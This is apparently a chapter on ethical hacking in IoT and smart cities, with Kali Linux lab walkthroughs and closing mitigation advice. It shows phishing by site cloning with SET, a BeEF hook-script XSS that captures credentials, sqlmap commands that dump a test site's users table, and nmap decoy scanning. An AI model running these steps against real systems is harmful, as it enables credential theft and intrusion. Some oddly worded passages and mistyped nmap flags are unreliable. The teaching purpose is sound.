Keywords

1 Introduction

Globally, the metropolitan population is growing, and insightful urban planning programs leverage the potential of the Internet of Things (IoT) to create better, more effective, and more productive solutions. However, investment in data security in smart cities lags drastically, thereby creating the future vulnerabilities of the IoT ecosystem. The smart cities have a very dynamic and interdependent network of computers, networks, platforms, and users. The vertical networks that vendors and governments must protect are just smart electricity, utilities, water and pollution, parking and automotive, industrial, and engineering, buildings automation, ego-government and telemedicine, oversight, and public protection.

IoT provides effective and efficient ways to work with patients and becomes a big development solution for health care. Given the growing number of Covid-19 patients, IoT has now dominated the healthcare sector, including numerous applications such as telemedicine, connected imaging, inpatient monitoring, drug control, relevant protection, integrated nursing, connected emergencies, and many others. The latest outbreak of COVID-19 has driven IoT health network vendors to rapidly come up with strategies to meet the growing need for high-quality virus protection services. Technologies such as telemedicine offer electronic services for patients and interactive medicine and medical care are anticipated to take root during this time.

Cybercrimes are now rising rapidly as Internet use is growing. It is necessary to be aware of current and recent threats, system vulnerabilities, and security prevention measures, network, and systems from these attacks. Because of the growth of the Internet, data protection and network security are essential areas of distress. To protect networks, systems, and applications from malicious illicit hacking activities, IT scientists and researcher are creating new frames and technologies. The attackers have plenty of options to manipulate the information they gather, damage the network, and disable the application services when they are hacked to a web site or device. It is therefore very critical that the correct network, device security policies, interventions and vulnerabilities be carefully monitored and enforced. Many companies, like Google, Banking and Microsoft, are promoting several challenges in ethical hacking, examining their system vulnerabilities, giving the ethics hacker huge prize money [1]. Besides, numerous network consultancies evaluate the facilities and networks of the organizations and propose the best approaches and suggestions for their better safety [2]. The Internet has become a necessity in today’s era for the public due to its widespread usage in various sectors such as education, finance, social media application, government services and many more. If an Internet user completes activities, it raises the risk of personal data being abused by hackers or philanthropically targeted by a user in the form of identity theft.

The researcher expresses that every system is different from others due to its functionality, requirements, and complexity. That needs a careful deployment of security measures and mitigation planning. Internet security knowledge has become essential now a day due to digital data popularity, and systems are always connected to an Internet connection. It is individual and companies’ responsibility to take proper security measures against information breaches and implement appropriate policies and controls. One of the critical methods to inspect their vulnerabilities and enhance network security is to continue to perform penetration testing. We are connected around the world through the Internet. Rapid Internet development and use have had a tremendous effect on culture, allowing people to accomplish their everyday activities and to communicate across the globe. Yet external assaults on the internet do increase and damage society. Hacking is an operation where a person uses the vulnerability of a system for self-benefit. It refers to obtaining access to a computer, a system, or a network to get information stored on it by cracking or using other data collection techniques. It can be performed by finding system vulnerabilities or through sabotage [3].

IoT and Smart City Networks shall ensure that certain accidents do not arise and protection of the consumer data is protected. Critical data such as financial statements, customer accounts and confidential data is stored on platforms and systems. Three criteria such as confidentiality, integrity and availability must be considered when designing a secure network infrastructure. Several mechanisms are currently used for the screening of processes, networks, and security of software. Kali Linux is one of the best-known free tools. In this article, we used Kali to conduct numerous experiments to inspect vulnerabilities in device, network, and application. In Kali we used SETOOLKIT program for phishing, the Browser Manipulation Platform and SQL Map to target a victim’s machine through SQL injection. We also conducted a penetration test with NMAP to access a port evaluation of a victim unit. These techniques and experiments are used to inform users about how these attacks are successful, effective, and mitigated. Finally, we have made several suggestions to assist consumers and organizations in improving their networks and enforcing proactive strategies to discourage uncertain practices.

2 Literature Review

We have reviewed various papers, in which researchers mainly focused on a particular attack and topic. However, there are a lack of good hacking papers that explain different attack methodologies within one paper, the nature of attacks and proceeding for a fresh Ethical Hacking user. In this research, we have described the step-to-step experimental approach for beginner to understand the Ethical Hacking terminology along with a specific type of attacks processing.

In the following paper [4], the author demonstrates Cross-Site Scripting attacks on the banking websites and proposed the appropriate solution for its mitigation. Online services are a common way of delivering Digital Banking Connect. Browser server concurrently checks and report vulnerabilities alarmingly soon. Online apps often use JavaScript programming, which is used in web pages to support dynamic client-side behaviour. This script code is implemented in the web browser of the user. A sandboxing mechanism is used to safeguard the user’s environment against malicious JavaScript code that restricts a program to only access resources associated with its originating location. Such protection measures are, sadly, ineffective if a user can access malicious JavaScript code from a trusted central location. This gives a malicious script complete access to all the tools that belong to the trustworthy site e.g., authentication tokens and cookies. These attacks are known as cross-site scripting (XSS) attacks. XSS attacks are usually easy to execute but difficult to detect and avoid. One explanation is that HTML encoding systems give many possibilities to attacker to prevent malicious scripts from being inserted into trustworthy sites by bypassing server-side input filters. Developing a customer-side solution is not easy because JavaScript code is difficult to classify as malicious. In this paper, the author proposed Noxes, a web proxy-based tool as a client-side solution to prevent the cross-site scripting attack. Noxes serves as a web proxy and uses both manual and automated rules to avoid cross-site scripting efforts. Noxes effectively defends the user against information leakage while requiring minimal contact with the user and personalization. However, the proposed solution was limited to prototype only, and it was only developed using. NET. The approach has some limitations and requires a lot of manual configurations and lack of SSL support.

In this paper [5], the author discussed an overview of various kinds of organized query language injections, cross-site scripting attacks, vulnerabilities, and prevention techniques. However, on contents analysis and a survey was presented in this research paper without using any experimental study.

In the following paper, the authors showed some penetrate testing experiments using Metasploit framework to assess the system vulnerabilities. The paper included an elementary experiment of Metasploit testing and was only valid for SCADA systems [6].

The following paper discusses the ethical hacking and computer systems stability related issues [1]. We imply the core three characteristics of a framework when we talk about protection in an information network, confidentiality, integrity, and availability. There are several methods of finding current protection vulnerabilities and safety reviews. One is Kali Linux, with its built-in versatile resources that are particularly suited to conduct specific types of assaults. In this paper, the author provides an outline of several options available in Kali OS to exploit client and server-side services. They mainly discussed the benefits of using Kali that offers a variety of hacking tools and free application to access system vulnerabilities.

3 Internet of Things (IoT)

In the last two periods, IoT networks have been renowned and used for their usability and efficiency in many industries such as smart cities, agriculture, pharmacy, manufacture and so forth. In the IoT or Smart networks, transceiver, sensors, microcontrollers, and energy sources are integrated. Other technologies such as WSN, RF identification, cloud computing, middleware systems and end-user applications are implemented in IoT [3].

The IoT-related networks are usually a mixture of several computers linked worldwide. IoT technology links clever computers, gateways, data networks and apps via cloud storage. These intelligent devices will typically be processed and deposited at different distances in many scenarios and managed by the centralized management framework. The entire IoT architecture comprises of different elements, blocks, modules, and protocols. IoT’s modules consist of a sensing device, a contact unit, a computer and an internet unit alongside related protocols and services. The IoT model consists of six blocks, like Identification Block, Sensing Block, Communication Block, Computational Block, Service Block and Semantics Block.

The IoT protocol can be categorized into two specific forms of data access control, such as IoT network protocols and IoT application protocols. For examples of protocols are Constrained Application Protocol (CoAP), Message Queue Telemetry Transport (MQTT), Zigbee, LoRaWAN etc. [7].

By 2020, the intelligent city market is predicted to hit $400 billion. The metropolitan population is rising alarmingly rapidly. One report indicates that 65% of the world population would be residing in cities by 2040. By 2040. Through me, it looks like anarchy. We need cybersecurity to maintain wellness in intelligent communities [8]

While the value of details users exchanges in an smart city infrastructure might not appear important for individual user; however, the knowledge is a gift for a hacker to exploit the related network. In smart cities, there is a wide potential for instability. Hackers may take possession of critical infrastructure AIs that position water or energy in malicious actors’ hands, for example.

As such, the first move towards secure intelligent cities consists of finding weaknesses for hackers in every system and potential entry points. It may be a single, intelligent meter in a broad power grid scheme. Therefore, computer criminals that are eager to create mayhem at the least chance are plagued.

Ethical Hacking the Internet of Things (IoT) involves knowing how these systems operate and how IoT and Smart system networks can be secured while these devices are on-line. This chapter lets users consider the various communications models used by IoT devices and the most basic architectures and protocols. It will cover numerous risks, if not handled properly, that IoT devices generate and how to secure the networks. Finally, you can learn the numerous methods that can be used against you and some countermeasures to secure your capital better.

4 Ethical Hacking

In today’s busy world, we are growing to be connected only through the Internet [9]. During difficult times like CoVID-19, the Web put the world together to worked continuously. Rapid Internet growth has produced positive results while also has a dangerous darker side of criminal hackers. Hacking is an operation where a person uses the vulnerability of a system for self-benefit. Hacking refers to obtaining access to a computer to get information stored on it using password cracker software or other data collection techniques. It is done either to point out the loopholes or to cause deliberate sabotage to the system.

When companies and individual utilized many online facilities and rely on the Internet, hackers find more ways and opportunities along driving their power to access confidential data through Web applications and online systems [9]. Therefore, the need to protect the online applications and systems from the hackers heavily increases along with demand of people who can punch back these illegal attacks occur on the users’ systems. Thus, ethical hackers have succeeded in solving these real problems. Ethical hacking is related to identifying and rectifying the vulnerabilities and weaknesses of the system. Hence, it can be described as the hacking process without malicious intention or harm to any network. Ethical hacking also can be defined as a security assessment, a sort of training or an information technology environment security check. This process shows the risks that an information technology environment faces and the measures that can be taken to reduce the certain risks. Furthermore, it is also known as Penetration Hacking, Red Teaming, or Intrusion Testing [10].

An ethical hacker is a computer expert who works on a security system and looks for the vulnerabilities that a malicious hacker might exploit [11]. They use their imagination and expertise to make a company’s online world a fool proof and safe place for both owners and customers. Such ‘Cyber Cops’ prevent the cyberspace from cybercrimes [12]. Ethical hacking is needed to protect the system from the damage the hackers’ cause. The principal reason behind the ethical hacking study is to evaluate the protection of the target device and report back to the owner. Ethical hacking is a complex process as the penetration test once leads to the current security issues that evolve. There are many techniques used to hack information such as Information gathering, Vulnerability scanning, Exploitation and Test Analysis. Other techniques include Phishing Hack where the attacker will attempt to obtain information about individuals or a specific person with sensitive information such as credit card numbers and passwords. Denial of Service (DoS) attacks where a hacker targets a system and ensures that the network is inaccessible to intended users for a limited period or a longer duration. Malware refers to all types of Viruses and Trojans, Worms, etc., that are injected by hackers to damage the targeted systems, to collect the important information and access vulnerabilities the targeted system. Hacking phases also include Reconnaissance (Gathering information), Scanning (Getting IP addresses and user information from the target system), Owning system (Gaining access and entry into the network), Zombie system (hijacked owned system) and Destroying evidence of attack [13].

Ethical hacking requires automated tools. The hacking process is slow and time-consuming, without automatic tools. NMAP is a well-known automated tool which is used in the hacking environment for port scanning and services accessibility purposes. Nessus is another hacking tool available for home users. Metasploit includes a database with a list of available exploits and is easy to use and one of the best penetration testing software. NetStumbler also can be used forward driving and is useful for Windows OS. Wireshark also used to capture the packets and access the network traffic [14, 15]. Ethical hacking has some advantage that these forms of tests can provide credible evidence of threatened disclosure to the actual devices, applications, and network-level by proof of access. This helps the companies to enhance overall network security proactively and develop maturing security knowledge through a combination of procedures, processes, technological infrastructure, and network requirements, monitoring and audit methods. The findings would provide a good picture of the operation and response mechanisms of the detection processes. These “Tests” may also detect vulnerabilities such as many network security managers can be not as aware of hacking methods as hackers. These results may lead to improved communication between system managers and technicians and the establishment of training standards [16]. The test is usually limited to operating systems, security configurations, and bugs, unfortunately. These tests are also carried out by a reputable third party and needs to be considered because we might need to provide internal information to speed up the process and save time.

5 Breach Testing

More than obvious are the security threats to businesses, organizations and agencies that deal with confidential data. Such companies have just a little to no oversight over them in certain cases. The uncontrolled risks can increase the number of security attacks which can turn into huge financial losses. Some protective mechanisms like prevention, identification, and quick response can be used to guarantee protection in every network. Prevention is the method of trying to prevent intruders from accessing the system’s resources. The detection takes place when the attacker has been successful or is in the process of gaining access to the device. Response refers to a mechanism that occurs after the effect that attempts to respond to the failure of the first two mechanisms. It operates by attempting to stop and avoid potential damage or access to networks or systems. However, the assessment of the security state is an ongoing and important process to consider the risks involved [17].

One of the established ways of determining safety status and rising safety risks is called as the penetration test (Pentest). Pentest is a managed attempt to infiltrate a device or network so that the weaknesses are found. It is an authorized simulated cyberattack on a network that is performed to assess system security. Pentest uses similar techniques as hackers use in a normal attack. This process allows appropriate measures to be taken to eliminate the vulnerabilities before unauthorized persons can explore them [18]. These tests are performed to scrutinize most of the vulnerabilities, including the potential for unauthorized parties to gain access to the features and data of the program, and strengths to complete a full risk assessment. Penetration tests are used to detect exploitation and vulnerability in the organization’s system and help developers to create secure and needful systems. Businesses and individual need to protect their information from the external/internal attackers and continuously track the importance of security issues arise. The data produced from the test are considered private and confidential, as it shows all device troubles and how they can be used. Pentest can be achieved by targeting the device like the external attackers’ action and finding out what can be gained. The attack may not include many vulnerabilities by making an attack chain sequence (Multi-Step Attack) to achieve the target. It is also called as a risk assessment, which can be used to track network security [19]. The penetration test process can be broken up into such tasks as the collection of information from the target system, the review of the target system to determine the facilities and protocols that are available, the identification of existing target systems and applications, and the identification of exploits and vulnerabilities in known applications and systems. The Pentest application method can be a way of determining a system’s security level. The stronger the Pentest will lead to more successful assessment. The application of Pentest can be based on certain parameters. It can be based on the level of the knowledge about the company before the execution of Pentest, the level of depth of the test used to determine whether it is attempting to identify the main vulnerabilities or exploit all possible attacks, test scope and the techniques and methodologies used on Pentest.

6 Vulnerability Assessment

Vulnerability means a flaw or defect in any system or security infrastructure module. If there are not vulnerabilities, we can call those systems as vulnerable free system or secure environment. To assess the vulnerability of any system, we need to find the weakness in any application or any system or any infrastructure. If we find any weakness in any system, it might be an entry point for any attacker or intruder to infect the system or to harm the entire environment. The attacker may gain additional benefits like acquiring illegal or unauthorized access to any user’s account. Vulnerabilities have the highest risk to any computing environment [12, 20]. But unfortunately, we have underestimated the requirements of vulnerability assessment and penetration testing, which are key to the cyber defence mechanisms.

7 Financial Losses and Cybercrime Cases

Now a day’s cybercrimes are increasing rapidly throughout the world, which causes substantial financial losses to businesses and individuals. Recent surveys and cybersecurity reports indicate that hacked and compromised data cases are mainly increasing among familiar workplace sources such as mobile users, IoT networks, social media, and other services].

According to the Kaspersky survey reported in the security bulletin, 11,544,340, possible threats were observed in the last quarter of the 2019 year in Malaysia [21]. From 2018 to August 2019, cyber scams led to losses of RM410.6 million, with 8,489 incidents reported in Malaysia [22]. In 2017, Microsoft in collaboration with Frost & Sullivan, accomplished research that reveals Malaysia could face a possible economic loss of US$ 12.2 billion (RM49.15 billion) due to cybersecurity incidents that are more than 4% of Malaysia’s total GDP of US$296 billion [23]. National Cybersecurity Oman is also revealing that in 2018, Omani’s cyberspace saw over 430,000 attempts and over 71,000 network attacks [24]. Another survey by Cybersecurity Ventures predicts that cybercrime damage could cost the world $6 trillion per annum by 2021, rises from $3 trillion in 2015. Even in the USA, companies like Equifax, Yahoo, and the U.S. military have been seen to fight cyber-attacks again. A single malware attack in 2018 cost more than $2.6 million to companies in the USA [25]. Recent security research shows that most companies and individuals are vulnerable to data loss, with insecure data and inadequate cybersecurity policies and with a lack of knowledge. Therefore, organisations and individual must incorporate cybersecurity awareness, protection, and risk mitigation to combat malicious activities.

Dubsmash is video dubbing software, where users can dub and record them for any audio or video part from a movie, music, shows, and latest trending videos. It has been hacked in December 2018. The hacker has stolen 161.5 million user account details with their credentials, which includes usernames, hashed passwords, and email IDs. Dubsmash has officially announced, this hacking incident in February 2019. The hackers have posted “The data for sale” publicly on the dark web in 2019. As a corrective measure, Dubsmash has urged all its users to change their password with immediate effect [26].

Capital One is a pioneer in the banking sector and financial corporation which deals with banking, credit cards, loans, and savings accounts for the customers. It is based out in the United States of America. In March 2019, A data theft happened to the servers of capital, one losing 106 million of customer sensitive data. Capital One has announced that hackers have gained access to the confidential information of consumers, applicants, and businesses who operated with applications by credit card from 2005 to early 2019. Additionally, 80,000 bank accounts that are linked to the customers are also exposed and hacked. Capital One later patched the exploit and strived hard to work with the federal law of enforcement on the data breach happened [27].

The AMCA is a medical billing company and medical test reports holding company based out in the USA. In 2019, AMCA faced the worst data breach ever happened to lose its 7.7 million of customer data. AMCA has officially declared that it has lost the details such as names of the customers, date of birth, contact numbers, address, medical history, medical services, health care providers and data on balance etc. Insurance ID, medical test reports, and social security numbers were not part of stolen data. Since AMCA has contracted with many other companies, so there are chances that the companies which is linked with them also likely affected by data breach [28].

8 Ethical Hacking and Breach Testing Using Kali

Information security assessment may usually describe in four categories such as risk assessment, compliance monitoring, standard internal/external penetration testing and application evaluation. Various techniques and tools are used to identify and inspect existing security vulnerabilities in the system, application, and networks [29].

BeEF is an abbreviation of “The Browser Exploitation Framework” that is a security tool used for penetration testing by a system administrator. It helps to create additional attack vectors when assessing the posture of a target. It is an exploitation tool which focuses on the specific client-side application and web browser. It provides practical client-side attack vectors for the penetrate testers. It evades network security appliances and host-based antivirus application by targeting the vulnerabilities found in common browsers. It allows an attacker to inject JavaScript code into a vulnerable HTML code using an attack such as XSS. The browsers are hooked by the BeEF using a script for further attack.

SQL Map is an open-source penetration testing tool which detects and automatically exploit SQL injection flaws to retrieve information from the database server. It has a strong detection engine, many nice features for the ultimate penetration testing, and a wide range of fingerprinting switches via database selection, data fetching from the database to accessing the underlying file system and executing commands on the operating system via the off-site connection. The SQL Map can be used for the various purposes such as to Scan web apps against SQL injection vulnerability, to exploit SQL injection vulnerabilities, to extract databases and database user detail entirely, to bypass Web Application Firewall (WAF) by using tamper scripts and own the underlying operating system.

In this chapter, we have performed several experiments and explained in detail how to perform ethical hacking using free tools Kali. The attacks included in the toolkit are designed to target the individual or organization to concentrate on the distribution of penetration assessment. They are aims to simulate and increase social engineering assaults; the SET tool has been known as a standard tool used for penetration testing. Moreover, this chapter provides prevention methods as well to reduce the attacks possibility to increase individual and organization security infrastructure.

9 Social Engineering Tool Kit (Set) Discussion

Social Engineering Toolkit is an open-source python base suite of customized tools written by David Kennedy to conduct penetration tests that run on Kali. In these experiments, we have attacked an organization website that was running on a local server. We have bypassed the security barriers and clone the real website. Later, we have sent the clone weblink to our victim user as a practice of social engineering and retrieved the user information on our Kali OS. We have used the SET tool to perform a phishing activity on a victim website by cloning it (website spoofing) and get login user details such as “Username” and “Password” by cloning a site. Phishing is an Internet fraud type in which an attacker tricks the victim to provide their sensitive information, such as username, password, credit card number, etc. We have used Linux Kali OS to run it on a Virtual Machine (VM) and performed the following experiments. SETOOLKIT application and mobile phone are used in this experiment. First, we have selected a victim website without security barriers and cloned it using SET. We have chosen the 1st option, “Social Engineering Attacks” to perform the social engineering activity and clone the victim website. Besides, SET provides website templates for some popular websites, such as Google, Facebook, Yahoo, and Twitter. If a user wants to clone these popular websites, he can choose the 1st option of Web Templates. Hereafter, we have entered the IP address of our Kali VM. Once the cloning process has been completed, a user can send his IP address to the victim users. When the victim clicks on the given IP address, he will be directed to the cloned website IP address. To test and verify this process, we have sent the cloned website IP address to a victim user device and open the cloned website from a victim’s mobile phone. The cloned website looks precisely like the original website at the victim device shown in Fig. 1.

Fig. 1
figure 1

Opened cloned website on victim device

Full size image

When the victim types his Username and Password to login on the fake website, all information was reached to us which were retrieved on the Kali. The SET tool has harvested the victim entered data such as Username and Password, as shown in Fig. 2.

Fig. 2
figure 2

Retrieving user details on Kali

Full size image

10 Browser Exploitation Framework (BeEF) Discussion

BeEF application is built into the Kali and used for the cross-site scripting kind of attacks. When a system is infected with these types of malware, it will become slower. It will send the user confidential information to the attacker, including CPU performance and memory, and frequently rebooting without the consent of the user. In this experiment, we have demonstrated the use of BeEF to perform cross-site scripting (XSS). The BeEF server can be accessed in any browser on the localhost. It runs a web server at port 3000. The BeEF will usually start a web server and an authentication page will be opened automatically in the default browser. BeEF authentication page can also be accessed through the following URL: http://localhost:3000/ui/authentication. The default username and password for BeEF authentication is “BeEF”. After logging to the BeEF, “Hooked Browsers” option shows the victims hooked status. The BeEF hooks a JavaScript file which used to hook and exploit target web browsers an acts Command and Control (C&C) between the target and the attacker. Once a targeted web browser it is hooked, the attacker can execute commands on the target browser to gather information about the target. First, we need to find out our machine IP address and then write the script for hooking inside the web page that we want the targeted browser to run. The example of a script for hooking is: <script src=”http://127.0.0.1:3000/hook.js”></script>. In our target machine, we have created a web page that allows the user to input the text, and we host the website using the XAMPP server. The user input will be “echo” when the user presses the submit button. We run the website and input the script for hooking inside the text area and press the submit button. The script for hooking is “echo”. After the script for hooking is echo, the target browser is hooked. By clicking on the targeted machine’s IP address, we can observe the details of his browser in Fig. 3.

Fig. 3
figure 3

Targeted machine browser info—hooked

Full size image

Then, we executed some command on the target browser under the command tab to retrieve his browser victim user information. In this example, we perform ‘google phishing’ command in the social engineering folder to turn the web page in the target browser to a google phishing website. We have changed the XSS host URL to http://192.168.3.102:3000/demos/basic.html. It can be seen in Fig. 4 to get the user input from the target browser.

Fig. 4
figure 4

XSS host URL

Full size image

Then, we executed the web page in the target browser has been changed to a Google webpage asking for username and password, which can be seen in Fig. 5.

Fig. 5
figure 5

Google webpage on user device

Full size image

When the victim entered his username and password in the targeted browser and pressed “Sign In” button, we have got his username and password through the BeEF by clicking the module results in Module Results History, can be seen in Fig. 6.

Fig. 6
figure 6

Retrieving user details

Full size image

11 SQL Analysis Discussion

SQL is an injection code technique in which an attacker performs malicious SQL queries to access the database of a web application. To find a vulnerable website, we need to use Google Dorks strings such as in URL: item_id= and inurl:index.php?id= . In these experiments, we use http://testphp.vulnweb.com. When we search on the site, the URL was changed to “http://testphp.vulnweb.com/search.php?test=query”. To test whether a URL is vulnerable to SQL or not, we can add a single quote in the parameter. If this URL throws a SQL error, then this website is vulnerable to SQL injection. To start SQL Map, we opened the Kali terminal and typed the following command can be seen in Fig. 7.

Fig. 7
figure 7

Starting of SQL map

Full size image

sqlmap –u http://testphp.vulnweb.com/search. php?test=query

With this command, SQL map sends different SQL injection payloads to the input parameters and checks the output. The victim website, database name and version also will be identified by the SQL map. From the result shown in the Fig. 2, the version of back end DBMS is obtained, which is MYSQL, and the web application technology, which is NGINX, PHP 5.3.10 used by victim website, can be seen in the Fig. 8.

Fig. 8
figure 8

DBMS and MYSQL version

Full size image

To get a list of the available database, we use the command below (Fig. 9):

Fig. 9
figure 9

Extract database info

Full size image

sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –dbs

From the result shown in Fig. 3, we get the name of the two available databases, which are “acuart” and “information_schema”. Now we get the tables from the database named “acuart”. To get the tables in the database, we use the command below:

sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –tables -D acuart

From the result shown in Fig. 10, we get a list of tables from the acuart database.

Fig. 10
figure 10

List of extracted table from database acuart

Full size image

Now, we are getting the columns of the users’ table from the “acuart” database. To get columns in a particular database, we use the command below.

sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –columns -D acuart -T users

From the result shown in Fig. 11, we get a list of columns from the users’ table in acuart database.

Fig. 11
figure 11

List of extracted table columns

Full size image

Now, we are getting all the data from the users’ table in “acuart” database. To get all the data from the users’ table in acuart database, we use the command below:

sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –dump -D acuart -T users.

The information such as a “username” and password in the “acuart” database are extracted and shown in Fig. 12.

Fig. 12
figure 12

Extracted user detail from the table

Full size image

12 NMAP

NMAP is an open-source network mapping application for various platforms such as Linux, Windows, Mac OS. It can search for various network activities such as ping sweeps, port scanning, IP address spoofing, OS scanning or network intelligence. It is also a common tool for hackers to do Reconnaissance. Reconnaissance is one of the crucial preparatory steps to hacking to collect information about the victim operating system, ports, services, and application of the target computer before executing any attacks. In these experiments we have demonstrated some features that penetration testers would do during preparatory steps such as scanning for a specific port range, scanning a subnet, spoofing, and decoying scan, how to evade firewalls, gathering version info and output scanning results to a file.

In the 1st step, we have performed the Port Scanning to find out available open ports on the targeted machine. This task can be accomplished by using Nmap’s basic syntax “nmap sT 192.168.0.104” to scan the target machine. Figure 13 show the results of all TCP ports that are opened and the default service for that port are displayed in the console.

Fig. 13
figure 13

TCP ports information of victim computer

Full size image

Now to find out running OS details on the targeted machine, we need to perform an OS detection in Nmap by running the command “nmap 192.168.0.104 -O” whereby “-O” indicates the command for OS detection that can be seen in the Fig. 14.

Fig. 14
figure 14

Open ports information of victim computer

Full size image

Every packet contains the source IP address whenever the hacker communicates with the victim device. NMAP provide a function for hackers or penetrator to hide their identity so that the network administrator cannot find out the source of the attack. This can be done by implementing the decoy scan. NMAP provides a feature to bury our IP address among many IP addresses which also means the decoy IP address and will show many IP addresses that NMAP is scanning the target when the security admin is monitoring the network packets. We used -D command to do so. For example:

  • Nmap -sS 192.168.0.104 -D 192.168.139.127 192.168.139.129 192.168.139.130

Using this command, to put a few decoy IP addresses in our scan so that the target cannot determine the exact source of the scanning device. However, knowing the default service information might not be enough for penetration testers or hackers as there are many different services that can be run on a port. If the attack is mainly focusing on one service on a specific port, it is crucial to have more details about the service information. For example, if we are attacking specific web service such as Apache server, but the target is running Microsoft’s IIS server, then this attack will not be succeeded. Therefore, we need to ensure that the target service running to that port must be the same as our attack. To find out the detail information about the services running on a particular port, we used -V command for example: Nmap -V 192.168.0.100 as in Fig. 15.

Fig. 15
figure 15

Services information of victim computer

Full size image

13 Policy Base Solutions-Information Security Model and Frameworks

Cyber Security terminology refers to protecting connected devices via the Internet including hardware, software, and information from illegal or unauthorized access. Therefore, the protection against cybercrimes is very important and needs solid cybersecurity infrastructure to protect organization networks and systems. Several cyber-attacks may be carried out, including malware, phishing, Trojan horses, worms, Denial-of-Service (DoS), unauthorized access (such as intellectual property theft, confidentiality) and system-attacks. There are several reasons to develop appropriate standards, policies and used appropriate frameworks to protect organizations information infrastructure and assets. It helps organizations to improve their business process efficiency, reliability, and revenue growth. To make the organizations information security infrastructure reliable and secure; three major aspects need to consider and plan properly [30].

  1. i.

    Law and Regulation: Each organization must have or follow some Data Protection laws and standards to act against illegal activities from internal or external. They should clearly define and implement them for their survival.

  2. ii.

    Business Objectives: The main objective of each organization business operation is to gain financial benefits. The information Security plan must protect these objectives and help the organization to run the operation smoothly and safely.

  3. iii.

    Security Threats: Organization must understand expected security threats, limitations and should have the ability to tackle them to achieve business objectives.

The following model explains the detailed overview of Security Governance, Risk and Compliance (GRC) model [30] (Fig. 16).

Fig. 16
figure 16

Security governance, risk and compliance (GRC) model

Full size image

The Security Policy Framework (SPF) offer comprehensive protection to organizations network and allow them mandatory protective security outcomes among all departments. Therefore, every country now emphasizing and putting more budgets to develop their cybersecurity departments and building guidelines. Every organization should maintain and implement standard security measures to protect their information, services, applications, and information security assets to meet their SPF and the national cybersecurity standards obligations. There are various security frameworks available in the market such as NIST, CIS, ISO/IEC 27001, PDCA Cycle, IASME Governance, COBIT, COSO and others. Every organization should use appropriate SPF depending on their business and communication requirements among departments, customer, and stakeholders. These cybersecurity frameworks were proposed and use to enhance the organizations’ information security and standardize the security requirements worldwide.

NIST (National Institute of Standards and Technology) was introduced in the USA, 2013 as well-known security framework. The latest amendment was done in April 2018, named as Framework version 1.1 [31]. The framework was established by recognizing the needs of companies and shielding them from cybercrime. NIST offers a policy guideline that strengthens the capacity of businesses to prevent, detect and respond to cyber-attacks. It reduces cybersecurity risk, allow the stakeholder to defend against potential security threats and supports business processes with an efficient way. According to NIST, they are expected by 2020, 50% of USA companies will adopt the NIST framework to protect their assets and information security infrastructure [32]. Most businesses worldwide use NIST because of its advantages. Since NIST CSF focuses on technical regulation, it is, therefore, best fit for technology-oriented businesses (Fig. 17).

Fig. 17
figure 17

NIST cyber security framework

Full size image

NIST has five phases such as Identify, Protect, Detect, Response and Recover [32]:

  1. i.

    Identify: This phase mainly focusses on developing the organization understanding to manage cybersecurity risk towards their network, systems, application, services, assets, and information.

  2. ii.

    Protect: This phase, allows organizations to develop and implement the appropriate security barriers to ensure protection against cyber-attack and run their essential services in any situation.

  3. iii.

    Detect: It allows organizations to implement an appropriate security solution that can detect and occurrence of cyber-attack.

  4. iv.

    Response: The organization security infrastructure should be able to act fast in any emergency event occur and should have the ability to cater to losses.

  5. v.

    Recover: The organization should be able to recover and run the primary functions as soon as possible after any hacking or malicious event occurs.

Therefore, it is best to choose appropriate SPF that suit your organization depending on their business operating model. It is better to combine two models and get the maximum output.

14 Attacks Mitigation Solutions

There are a few ideas to prevent phishing attacks [33]. First, protect your email from a spam email. It can be done by using the email filtering features. However, this feature is not 100% accurate. Next, set the browsers to block all fraudulent websites. In this method, browsers will keep all the fraudulent websites, including the fake websites, so when a user tries to load the sites, the website should be blocked, and an alert is shown. It is a good practice to change your password regularly and never use the same passwords for all accounts. Besides, websites should have a captcha system to have better security. Likewise, the organization can block their websites from some malicious activities. For instance, THE website should not be cloned, the companies should prevent such actions from the cloning. Besides, the organization must train its employees to be aware of the attacks and limit the employees’ access when using the organization network and computers. Moreover, the user must remember that a bank or any financial institutions never send an email that asks for a password and username. When a user receives this kind of email, it is better to double-check with the bank or the financial institution. It is also essential to hover on every URL that a user receives from an email before clicking it. Usually, a reliable and secure website or link will have an SSL certificate begin with “https”. Ways to prevent from Social Engineering [34]:

  • Do not believe any untrusted source or link

  • Always check the URL and provide your details.

  • Do not download the unknown files.

  • Know the user and research the source.

Ways to prevent XSS [35]:

  • Allow only the whitelisted user inputs and perform Input/output encoding

  • Use CAPTCHA, Re-authentication, and unique request ID.

  • Ensure the presence of the authenticated user during these sensitive operations.

  1. i.

    Escaping: To prevent XSS vulnerabilities from appearing on the user’s and companies’ web applications, they should control and regularly monitored user inputs and traffic activities. They should adequately monitor websites’ data and traffic to control the attacks and illegal access to their sites. They should also ensure and build secure systems and policies to protect user information and their systems and network reliability. Vulnerable key characters received on the web pages would be prevented from being interpreted in any malicious way of escaping user input. For example, companies should not allow their web page to render the data which contains the characters such as < and > that cause harm to the web application. Companies and users should disallow the users to add the code to the page by escaping all HTML, URL, and JavaScript entities. If the web page needs to allow the user to add code to the page, then they should specify and control HTML entities or used a replacement format for raw HTML such as MarkDown that allows them to continue escaping all HTML.

  2. ii.

    Sanitizing: One way to prevent cross-site scripting attacks is to sanitize user input. Sanitize user input used to ensure that received data cannot perform harm to users as well as the database by scrubbing the data clean of potentially harmful markup, changing unacceptable user input to an acceptable format.

  3. iii.

    Validating User Input: To ensure the web application is rendering the correct data and preventing malicious data from harming the web application. Companies and users should validate user input. Whitelisting and validation inputs are standard methods for preventing SQL injection but can also be used in XSS prevention. Whitelisting only allows known good characters which are better than blacklisting, disallowing certain predetermined characters in user input, and disallowing only known bad characters. Input validation is helpful for form validation, as individual characters are prevented from adding into the field by the user. However, it is not a primary prevention method for XSS. It only helps to reduce the effects should an attacker discover such a vulnerability.

Ways to prevent SQL Injection:

  • Filter or restrict the special characters given as inputs. Sanitize the user inputs. Do not allow dynamic SQL queries.

  • Use POST methods to pass the user input parameters and use stored procedures wherever required.

  1. i.

    Trust No One: Companies and users need to assume all user-submitted data is evil, so they need to validate user input via a function such as MYSQL’s mysql_real_escape_string () to prevent any dangerous characters such as ‘from passing in a SQL query in the data. All user input should be filtered and sanitized. For example, input for the email address field should be filtered only to allow the characters allowed in the email address.

  2. ii.

